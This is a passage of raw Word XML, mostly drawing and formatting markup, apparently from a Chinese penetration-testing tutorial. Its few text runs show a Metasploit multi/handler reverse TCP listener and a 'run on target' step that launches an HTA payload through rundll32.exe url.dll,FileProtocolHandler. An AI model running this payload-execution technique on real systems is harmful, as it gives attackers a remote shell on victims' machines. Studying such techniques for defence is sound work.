      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐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‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐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7582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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>  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Wildcard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Target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23</w:t>
      </w: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24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5421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25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dc4867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multi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handler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26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="386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27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Started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reverse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TCP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handler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.4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53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28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07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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="154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8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rundll32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exe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url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dll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,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FileProtocolHandler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659800"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>file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//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C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\Users\John\Desktop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\Micropoor_url_dll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hta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19.500pt;margin-top:70.500pt;width:0.500pt;height:213.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1410" coordsize="10,4270">
        <v:shape style="position:absolute;left:10390;top:1410;width:10;height:4270" coordorigin="10390,1410" coordsize="10,4270" path="m10402,1420l10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1421,10402,1421,10402,1422,10402,1422,10402,1423,10402,1424,10402,1425,10402,1427,10402,1428,10402,1430,10402,1432,10402,1434,10402,1437,10402,1440,10402,1443,10402,1447,10402,1450,10402,1455,10402,1459,10402,1464,10402,1469,10402,1475,10402,1481,10402,1488,10402,1495,10402,1503,10402,1511,10402,1519,10402,1528,10402,1538,10402,1548,10402,1558,10402,1570,10402,1582,10402,1594,10402,1607,10402,1621,10402,1635,10402,1650,10402,1666,10402,1682,10402,1699,10402,1717,10402,1736,10402,1755,10402,1775,10402,1796,10402,1818,10402,1841,10402,1864,10402,1888,10402,1913,10402,1939,10402,1966,10402,1994,10402,2022,10402,2052,10402,2083,10402,2114,10402,2147,10402,2180,10402,2215,10402,2251,10402,2287,10402,2325,10402,2364,10402,2404,10402,2445,10402,2487,10402,2530,10402,2574,10402,2620,10402,2667,10402,2715,10402,2764,10402,2814,10402,2866,10402,2919,10402,2973,10402,3028,10402,3085,10402,3143,10402,3203,10402,3264,10402,3326,10402,3389,10402,3454,10402,3520,10402,3588,10402,3657,10402,3728,10402,3800,10402,3874,10402,3949,10402,4026,10402,4104,10402,4183,10402,4265,10402,4348,10402,4432,10402,4518,10402,4606,10402,4695,10402,4786,10402,4879,10402,4973,10402,5069,10402,5167,10402,5266,10402,5368,10402,5471,10402,5575,10402,5682e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1410;width:8990;height:390" coordorigin="1490,1410" coordsize="8990,390" path="m1510,1420l1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1511,1420,1512,1420,1512,1420,1514,1420,1515,1420,1517,1420,1519,1420,1521,1420,1524,1420,1528,1420,1532,1420,1536,1420,1541,1420,1546,1420,1552,1420,1559,1420,1566,1420,1575,1420,1583,1420,1593,1420,1603,1420,1615,1420,1627,1420,1640,1420,1654,1420,1668,1420,1684,1420,1701,1420,1719,1420,1738,1420,1758,1420,1780,1420,1802,1420,1826,1420,1851,1420,1877,1420,1904,1420,1933,1420,1963,1420,1995,1420,2028,1420,2063,1420,2099,1420,2136,1420,2175,1420,2216,1420,2259,1420,2303,1420,2348,1420,2396,1420,2445,1420,2496,1420,2549,1420,2604,1420,2660,1420,2719,1420,2779,1420,2841,1420,2906,1420,2972,1420,3041,1420,3112,1420,3184,1420,3259,1420,3336,1420,3416,1420,3498,1420,3582,1420,3668,1420,3757,1420,3848,1420,3941,1420,4037,1420,4136,1420,4236,1420,4340,1420,4446,1420,4555,1420,4666,1420,4780,1420,4897,1420,5017,1420,5139,1420,5264,1420,5392,1420,5523,1420,5657,1420,5793,1420,5933,1420,6076,1420,6222,1420,6370,1420,6522,1420,6677,1420,6835,1420,6997,1420,7161,1420,7329,1420,7500,1420,7675,1420,7853,1420,8034,1420,8219,1420,8407,1420,8598,1420,8793,1420,8992,1420,9194,1420,9400,1420,9609,1420,9823,1420,10039,1420,10260,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1421,10484,1421,10484,1421,10484,1421,10484,1422,10484,1422,10484,1422,10484,1423,10484,1423,10484,1423,10484,1424,10484,1424,10484,1425,10484,1425,10484,1426,10484,1427,10484,1427,10484,1428,10484,1429,10484,1430,10484,1431,10484,1431,10484,1432,10484,1433,10484,1435,10484,1436,10484,1437,10484,1438,10484,1439,10484,1441,10484,1442,10484,1444,10484,1445,10484,1447,10484,1449,10484,1450,10484,1452,10484,1454,10484,1456,10484,1458,10484,1460,10484,1463,10484,1465,10484,1467,10484,1470,10484,1472,10484,1475,10484,1478,10484,1480,10484,1483,10484,1486,10484,1489,10484,1493,10484,1496,10484,1499,10484,1503,10484,1506,10484,1510,10484,1514,10484,1517,10484,1521,10484,1525,10484,1530,10484,1534,10484,1538,10484,1543,10484,1547,10484,1552,10484,1557,10484,1562,10484,1567,10484,1572,10484,1578,10484,1583,10484,1589,10484,1594,10484,1600,10484,1606,10484,1612,10484,1618,10484,1625,10484,1631,10484,1638,10484,1644,10484,1651,10484,1658,10484,1665,10484,1673,10484,1680,10484,1688,10484,1695,10484,1703,10484,1711,10484,1720,10484,1728,10484,1736,10484,1745,10484,1754,10484,1763,10484,1772,10484,1781,10484,1791,10484,1800,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10483,1810,10482,1810,10482,1810,10480,1810,10479,1810,10477,1810,10475,1810,10473,1810,10470,1810,10466,1810,10462,1810,10458,1810,10453,1810,10448,1810,10442,1810,10435,1810,10428,1810,10419,1810,10411,1810,10401,1810,10391,1810,10379,1810,10367,1810,10354,1810,10340,1810,10326,1810,10310,1810,10293,1810,10275,1810,10256,1810,10236,1810,10215,1810,10192,1810,10168,1810,10143,1810,10117,1810,10090,1810,10061,1810,10031,1810,9999,1810,9966,1810,9931,1810,9895,1810,9858,1810,9819,1810,9778,1810,9735,1810,9691,1810,9646,1810,9598,1810,9549,1810,9498,1810,9445,1810,9391,1810,9334,1810,9275,1810,9215,1810,9153,1810,9088,1810,9022,1810,8953,1810,8883,1810,8810,1810,8735,1810,8658,1810,8578,1810,8497,1810,8413,1810,8326,1810,8238,1810,8146,1810,8053,1810,7957,1810,7859,1810,7758,1810,7654,1810,7548,1810,7439,1810,7328,1810,7214,1810,7097,1810,6977,1810,6855,1810,6730,1810,6602,1810,6471,1810,6337,1810,6201,1810,6061,1810,5918,1810,5773,1810,5624,1810,5472,1810,5317,1810,5159,1810,4997,1810,4833,1810,4665,1810,4494,1810,4319,1810,4141,1810,3960,1810,3776,1810,3587,1810,3396,1810,3201,1810,3002,1810,2800,1810,2594,1810,2385,1810,2172,1810,1955,1810,1734,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1808,1510,1808,1510,1808,1510,1807,1510,1807,1510,1807,1510,1806,1510,1806,1510,1805,1510,1805,1510,1804,1510,1804,1510,1803,1510,1802,1510,1802,1510,1801,1510,1800,1510,1799,1510,1798,1510,1797,1510,1796,1510,1795,1510,1794,1510,1793,1510,1791,1510,1790,1510,1789,1510,1787,1510,1786,1510,1784,1510,1783,1510,1781,1510,1779,1510,1777,1510,1775,1510,1773,1510,1771,1510,1769,1510,1767,1510,1765,1510,1762,1510,1760,1510,1757,1510,1755,1510,1752,1510,1749,1510,1746,1510,1743,1510,1740,1510,1737,1510,1734,1510,1730,1510,1727,1510,1723,1510,1720,1510,1716,1510,1712,1510,1708,1510,1704,1510,1700,1510,1696,1510,1691,1510,1687,1510,1682,1510,1678,1510,1673,1510,1668,1510,1663,1510,1657,1510,1652,1510,1647,1510,1641,1510,1635,1510,1630,1510,1624,1510,1618,1510,1611,1510,1605,1510,1599,1510,1592,1510,1585,1510,1578,1510,1571,1510,1564,1510,1557,1510,1549,1510,1542,1510,1534,1510,1526,1510,1518,1510,1510,1510,1502,1510,1493,1510,1485,1510,1476,1510,1467,1510,1458,1510,1448,1510,1439,1510,1429,1510,1420e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:69.599pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:89.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1790" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1790;width:8990;height:350" coordorigin="1490,1790" coordsize="8990,350" path="m1510,1810l1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1511,1810,1512,1810,1512,1810,1514,1810,1515,1810,1517,1810,1519,1810,1521,1810,1524,1810,1528,1810,1532,1810,1536,1810,1541,1810,1546,1810,1552,1810,1559,1810,1566,1810,1575,1810,1583,1810,1593,1810,1603,1810,1615,1810,1627,1810,1640,1810,1654,1810,1668,1810,1684,1810,1701,1810,1719,1810,1738,1810,1758,1810,1780,1810,1802,1810,1826,1810,1851,1810,1877,1810,1904,1810,1933,1810,1963,1810,1995,1810,2028,1810,2063,1810,2099,1810,2136,1810,2175,1810,2216,1810,2259,1810,2303,1810,2348,1810,2396,1810,2445,1810,2496,1810,2549,1810,2604,1810,2660,1810,2719,1810,2779,1810,2841,1810,2906,1810,2972,1810,3041,1810,3112,1810,3184,1810,3259,1810,3336,1810,3416,1810,3498,1810,3582,1810,3668,1810,3757,1810,3848,1810,3941,1810,4037,1810,4136,1810,4236,1810,4340,1810,4446,1810,4555,1810,4666,1810,4780,1810,4897,1810,5017,1810,5139,1810,5264,1810,5392,1810,5523,1810,5657,1810,5793,1810,5933,1810,6076,1810,6222,1810,6370,1810,6522,1810,6677,1810,6835,1810,6997,1810,7161,1810,7329,1810,7500,1810,7675,1810,7853,1810,8034,1810,8219,1810,8407,1810,8598,1810,8793,1810,8992,1810,9194,1810,9400,1810,9609,1810,9823,1810,10039,1810,10260,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1811,10484,1811,10484,1811,10484,1811,10484,1811,10484,1811,10484,1812,10484,1812,10484,1812,10484,1813,10484,1813,10484,1813,10484,1814,10484,1814,10484,1815,10484,1815,10484,1816,10484,1816,10484,1817,10484,1818,10484,1818,10484,1819,10484,1820,10484,1821,10484,1822,10484,1822,10484,1823,10484,1824,10484,1825,10484,1827,10484,1828,10484,1829,10484,1830,10484,1832,10484,1833,10484,1834,10484,1836,10484,1837,10484,1839,10484,1841,10484,1843,10484,1844,10484,1846,10484,1848,10484,1850,10484,1852,10484,1854,10484,1857,10484,1859,10484,1861,10484,1864,10484,1866,10484,1869,10484,1872,10484,1874,10484,1877,10484,1880,10484,1883,10484,1886,10484,1889,10484,1893,10484,1896,10484,1899,10484,1903,10484,1907,10484,1910,10484,1914,10484,1918,10484,1922,10484,1926,10484,1930,10484,1935,10484,1939,10484,1943,10484,1948,10484,1953,10484,1958,10484,1962,10484,1968,10484,1973,10484,1978,10484,1983,10484,1989,10484,1994,10484,2000,10484,2006,10484,2012,10484,2018,10484,2024,10484,2030,10484,2037,10484,2043,10484,2050,10484,2057,10484,2064,10484,2071,10484,2078,10484,2085,10484,2093,10484,2100,10484,2108,10484,2116,10484,2124,10484,2132,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10483,2140,10482,2140,10482,2140,10480,2140,10479,2140,10477,2140,10475,2140,10473,2140,10470,2140,10466,2140,10462,2140,10458,2140,10453,2140,10448,2140,10442,2140,10435,2140,10428,2140,10419,2140,10411,2140,10401,2140,10391,2140,10379,2140,10367,2140,10354,2140,10340,2140,10326,2140,10310,2140,10293,2140,10275,2140,10256,2140,10236,2140,10215,2140,10192,2140,10168,2140,10143,2140,10117,2140,10090,2140,10061,2140,10031,2140,9999,2140,9966,2140,9931,2140,9895,2140,9858,2140,9819,2140,9778,2140,9735,2140,9691,2140,9646,2140,9598,2140,9549,2140,9498,2140,9445,2140,9391,2140,9334,2140,9275,2140,9215,2140,9153,2140,9088,2140,9022,2140,8953,2140,8883,2140,8810,2140,8735,2140,8658,2140,8578,2140,8497,2140,8413,2140,8326,2140,8238,2140,8146,2140,8053,2140,7957,2140,7859,2140,7758,2140,7654,2140,7548,2140,7439,2140,7328,2140,7214,2140,7097,2140,6977,2140,6855,2140,6730,2140,6602,2140,6471,2140,6337,2140,6201,2140,6061,2140,5918,2140,5773,2140,5624,2140,5472,2140,5317,2140,5159,2140,4997,2140,4833,2140,4665,2140,4494,2140,4319,2140,4141,2140,3960,2140,3776,2140,3587,2140,3396,2140,3201,2140,3002,2140,2800,2140,2594,2140,2385,2140,2172,2140,1955,2140,1734,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2139,1510,2139,1510,2139,1510,2139,1510,2139,1510,2139,1510,2138,1510,2138,1510,2138,1510,2137,1510,2137,1510,2137,1510,2136,1510,2136,1510,2135,1510,2135,1510,2134,1510,2134,1510,2133,1510,2132,1510,2132,1510,2131,1510,2130,1510,2129,1510,2128,1510,2128,1510,2127,1510,2126,1510,2124,1510,2123,1510,2122,1510,2121,1510,2120,1510,2118,1510,2117,1510,2116,1510,2114,1510,2113,1510,2111,1510,2109,1510,2107,1510,2106,1510,2104,1510,2102,1510,2100,1510,2098,1510,2096,1510,2093,1510,2091,1510,2089,1510,2086,1510,2084,1510,2081,1510,2078,1510,2076,1510,2073,1510,2070,1510,2067,1510,2064,1510,2061,1510,2057,1510,2054,1510,2051,1510,2047,1510,2043,1510,2040,1510,2036,1510,2032,1510,2028,1510,2024,1510,2020,1510,2015,1510,2011,1510,2007,1510,2002,1510,1997,1510,1992,1510,1988,1510,1982,1510,1977,1510,1972,1510,1967,1510,1961,1510,1956,1510,1950,1510,1944,1510,1938,1510,1932,1510,1926,1510,1920,1510,1913,1510,1907,1510,1900,1510,1893,1510,1886,1510,1879,1510,1872,1510,1865,1510,1857,1510,1850,1510,1842,1510,1834,1510,1826,1510,1818,1510,1810e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:89.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1790" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:1790;width:30;height:350" coordorigin="1490,1790" coordsize="30,350" path="m1517,1810l1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1810,1517,1811,1517,1811,1517,1811,1517,1811,1517,1811,1517,1811,1517,1812,1517,1812,1517,1812,1517,1813,1517,1813,1517,1813,1517,1814,1517,1814,1517,1815,1517,1815,1517,1816,1517,1816,1517,1817,1517,1818,1517,1818,1517,1819,1517,1820,1517,1821,1517,1822,1517,1822,1517,1823,1517,1824,1517,1825,1517,1827,1517,1828,1517,1829,1517,1830,1517,1832,1517,1833,1517,1834,1517,1836,1517,1837,1517,1839,1517,1841,1517,1843,1517,1844,1517,1846,1517,1848,1517,1850,1517,1852,1517,1854,1517,1857,1517,1859,1517,1861,1517,1864,1517,1866,1517,1869,1517,1872,1517,1874,1517,1877,1517,1880,1517,1883,1517,1886,1517,1889,1517,1893,1517,1896,1517,1899,1517,1903,1517,1907,1517,1910,1517,1914,1517,1918,1517,1922,1517,1926,1517,1930,1517,1935,1517,1939,1517,1943,1517,1948,1517,1953,1517,1958,1517,1962,1517,1968,1517,1973,1517,1978,1517,1983,1517,1989,1517,1994,1517,2000,1517,2006,1517,2012,1517,2018,1517,2024,1517,2030,1517,2037,1517,2043,1517,2050,1517,2057,1517,2064,1517,2071,1517,2078,1517,2085,1517,2093,1517,2100,1517,2108,1517,2116,1517,2124,1517,2132,1517,2140e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:106.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2130" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2130;width:8990;height:370" coordorigin="1490,2130" coordsize="8990,370" path="m1510,2140l1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1510,2140,1511,2140,1512,2140,1512,2140,1514,2140,1515,2140,1517,2140,1519,2140,1521,2140,1524,2140,1528,2140,1532,2140,1536,2140,1541,2140,1546,2140,1552,2140,1559,2140,1566,2140,1575,2140,1583,2140,1593,2140,1603,2140,1615,2140,1627,2140,1640,2140,1654,2140,1668,2140,1684,2140,1701,2140,1719,2140,1738,2140,1758,2140,1780,2140,1802,2140,1826,2140,1851,2140,1877,2140,1904,2140,1933,2140,1963,2140,1995,2140,2028,2140,2063,2140,2099,2140,2136,2140,2175,2140,2216,2140,2259,2140,2303,2140,2348,2140,2396,2140,2445,2140,2496,2140,2549,2140,2604,2140,2660,2140,2719,2140,2779,2140,2841,2140,2906,2140,2972,2140,3041,2140,3112,2140,3184,2140,3259,2140,3336,2140,3416,2140,3498,2140,3582,2140,3668,2140,3757,2140,3848,2140,3941,2140,4037,2140,4136,2140,4236,2140,4340,2140,4446,2140,4555,2140,4666,2140,4780,2140,4897,2140,5017,2140,5139,2140,5264,2140,5392,2140,5523,2140,5657,2140,5793,2140,5933,2140,6076,2140,6222,2140,6370,2140,6522,2140,6677,2140,6835,2140,6997,2140,7161,2140,7329,2140,7500,2140,7675,2140,7853,2140,8034,2140,8219,2140,8407,2140,8598,2140,8793,2140,8992,2140,9194,2140,9400,2140,9609,2140,9823,2140,10039,2140,10260,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2140,10484,2141,10484,2141,10484,2141,10484,2141,10484,2141,10484,2141,10484,2142,10484,2142,10484,2142,10484,2142,10484,2143,10484,2143,10484,2144,10484,2144,10484,2144,10484,2145,10484,2146,10484,2146,10484,2147,10484,2147,10484,2148,10484,2149,10484,2150,10484,2150,10484,2151,10484,2152,10484,2153,10484,2154,10484,2155,10484,2157,10484,2158,10484,2159,10484,2160,10484,2162,10484,2163,10484,2165,10484,2166,10484,2168,10484,2170,10484,2171,10484,2173,10484,2175,10484,2177,10484,2179,10484,2181,10484,2184,10484,2186,10484,2188,10484,2191,10484,2193,10484,2196,10484,2198,10484,2201,10484,2204,10484,2207,10484,2210,10484,2213,10484,2216,10484,2220,10484,2223,10484,2227,10484,2230,10484,2234,10484,2238,10484,2242,10484,2246,10484,2250,10484,2254,10484,2258,10484,2263,10484,2267,10484,2272,10484,2277,10484,2282,10484,2287,10484,2292,10484,2297,10484,2302,10484,2308,10484,2313,10484,2319,10484,2325,10484,2331,10484,2337,10484,2343,10484,2350,10484,2356,10484,2363,10484,2369,10484,2376,10484,2383,10484,2391,10484,2398,10484,2405,10484,2413,10484,2421,10484,2428,10484,2436,10484,2445,10484,2453,10484,2461,10484,2470,10484,2479,10484,2488,10484,2497,10484,2506,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10483,2515,10482,2515,10482,2515,10480,2515,10479,2515,10477,2515,10475,2515,10473,2515,10470,2515,10466,2515,10462,2515,10458,2515,10453,2515,10448,2515,10442,2515,10435,2515,10428,2515,10419,2515,10411,2515,10401,2515,10391,2515,10379,2515,10367,2515,10354,2515,10340,2515,10326,2515,10310,2515,10293,2515,10275,2515,10256,2515,10236,2515,10215,2515,10192,2515,10168,2515,10143,2515,10117,2515,10090,2515,10061,2515,10031,2515,9999,2515,9966,2515,9931,2515,9895,2515,9858,2515,9819,2515,9778,2515,9735,2515,9691,2515,9646,2515,9598,2515,9549,2515,9498,2515,9445,2515,9391,2515,9334,2515,9275,2515,9215,2515,9153,2515,9088,2515,9022,2515,8953,2515,8883,2515,8810,2515,8735,2515,8658,2515,8578,2515,8497,2515,8413,2515,8326,2515,8238,2515,8146,2515,8053,2515,7957,2515,7859,2515,7758,2515,7654,2515,7548,2515,7439,2515,7328,2515,7214,2515,7097,2515,6977,2515,6855,2515,6730,2515,6602,2515,6471,2515,6337,2515,6201,2515,6061,2515,5918,2515,5773,2515,5624,2515,5472,2515,5317,2515,5159,2515,4997,2515,4833,2515,4665,2515,4494,2515,4319,2515,4141,2515,3960,2515,3776,2515,3587,2515,3396,2515,3201,2515,3002,2515,2800,2515,2594,2515,2385,2515,2172,2515,1955,2515,1734,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2514,1510,2514,1510,2514,1510,2514,1510,2513,1510,2513,1510,2513,1510,2513,1510,2512,1510,2512,1510,2511,1510,2511,1510,2510,1510,2510,1510,2509,1510,2509,1510,2508,1510,2507,1510,2507,1510,2506,1510,2505,1510,2504,1510,2503,1510,2502,1510,2501,1510,2500,1510,2499,1510,2498,1510,2496,1510,2495,1510,2494,1510,2492,1510,2491,1510,2489,1510,2487,1510,2486,1510,2484,1510,2482,1510,2480,1510,2478,1510,2476,1510,2474,1510,2472,1510,2470,1510,2467,1510,2465,1510,2462,1510,2460,1510,2457,1510,2454,1510,2451,1510,2448,1510,2445,1510,2442,1510,2439,1510,2436,1510,2432,1510,2429,1510,2425,1510,2421,1510,2418,1510,2414,1510,2410,1510,2405,1510,2401,1510,2397,1510,2393,1510,2388,1510,2383,1510,2379,1510,2374,1510,2369,1510,2364,1510,2358,1510,2353,1510,2347,1510,2342,1510,2336,1510,2330,1510,2324,1510,2318,1510,2312,1510,2306,1510,2299,1510,2293,1510,2286,1510,2279,1510,2272,1510,2265,1510,2258,1510,2250,1510,2243,1510,2235,1510,2227,1510,2219,1510,2211,1510,2202,1510,2194,1510,2185,1510,2177,1510,2168,1510,2159,1510,2149,1510,2140e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:106.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2130" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:2130;width:30;height:390" coordorigin="1490,2130" coordsize="30,390" path="m1517,2140l1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2140,1517,2141,1517,2141,1517,2141,1517,2141,1517,2141,1517,2141,1517,2142,1517,2142,1517,2142,1517,2142,1517,2143,1517,2143,1517,2144,1517,2144,1517,2144,1517,2145,1517,2146,1517,2146,1517,2147,1517,2147,1517,2148,1517,2149,1517,2150,1517,2150,1517,2151,1517,2152,1517,2153,1517,2154,1517,2155,1517,2157,1517,2158,1517,2159,1517,2160,1517,2162,1517,2163,1517,2165,1517,2166,1517,2168,1517,2170,1517,2171,1517,2173,1517,2175,1517,2177,1517,2179,1517,2181,1517,2184,1517,2186,1517,2188,1517,2191,1517,2193,1517,2196,1517,2198,1517,2201,1517,2204,1517,2207,1517,2210,1517,2213,1517,2216,1517,2220,1517,2223,1517,2227,1517,2230,1517,2234,1517,2238,1517,2242,1517,2246,1517,2250,1517,2254,1517,2258,1517,2263,1517,2267,1517,2272,1517,2277,1517,2282,1517,2287,1517,2292,1517,2297,1517,2302,1517,2308,1517,2313,1517,2319,1517,2325,1517,2331,1517,2337,1517,2343,1517,2350,1517,2356,1517,2363,1517,2369,1517,2376,1517,2383,1517,2391,1517,2398,1517,2405,1517,2413,1517,2421,1517,2428,1517,2436,1517,2445,1517,2453,1517,2461,1517,2470,1517,2479,1517,2488,1517,2497,1517,2506,1517,2515e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:124.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2490" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2490;width:8990;height:370" coordorigin="1490,2490" coordsize="8990,370" path="m1510,2515l1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1510,2515,1511,2515,1512,2515,1512,2515,1514,2515,1515,2515,1517,2515,1519,2515,1521,2515,1524,2515,1528,2515,1532,2515,1536,2515,1541,2515,1546,2515,1552,2515,1559,2515,1566,2515,1575,2515,1583,2515,1593,2515,1603,2515,1615,2515,1627,2515,1640,2515,1654,2515,1668,2515,1684,2515,1701,2515,1719,2515,1738,2515,1758,2515,1780,2515,1802,2515,1826,2515,1851,2515,1877,2515,1904,2515,1933,2515,1963,2515,1995,2515,2028,2515,2063,2515,2099,2515,2136,2515,2175,2515,2216,2515,2259,2515,2303,2515,2348,2515,2396,2515,2445,2515,2496,2515,2549,2515,2604,2515,2660,2515,2719,2515,2779,2515,2841,2515,2906,2515,2972,2515,3041,2515,3112,2515,3184,2515,3259,2515,3336,2515,3416,2515,3498,2515,3582,2515,3668,2515,3757,2515,3848,2515,3941,2515,4037,2515,4136,2515,4236,2515,4340,2515,4446,2515,4555,2515,4666,2515,4780,2515,4897,2515,5017,2515,5139,2515,5264,2515,5392,2515,5523,2515,5657,2515,5793,2515,5933,2515,6076,2515,6222,2515,6370,2515,6522,2515,6677,2515,6835,2515,6997,2515,7161,2515,7329,2515,7500,2515,7675,2515,7853,2515,8034,2515,8219,2515,8407,2515,8598,2515,8793,2515,8992,2515,9194,2515,9400,2515,9609,2515,9823,2515,10039,2515,10260,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2515,10484,2516,10484,2516,10484,2516,10484,2516,10484,2516,10484,2516,10484,2516,10484,2517,10484,2517,10484,2517,10484,2517,10484,2518,10484,2518,10484,2518,10484,2519,10484,2519,10484,2519,10484,2520,10484,2520,10484,2521,10484,2522,10484,2522,10484,2523,10484,2524,10484,2524,10484,2525,10484,2526,10484,2527,10484,2528,10484,2529,10484,2530,10484,2531,10484,2532,10484,2533,10484,2535,10484,2536,10484,2537,10484,2539,10484,2540,10484,2542,10484,2544,10484,2545,10484,2547,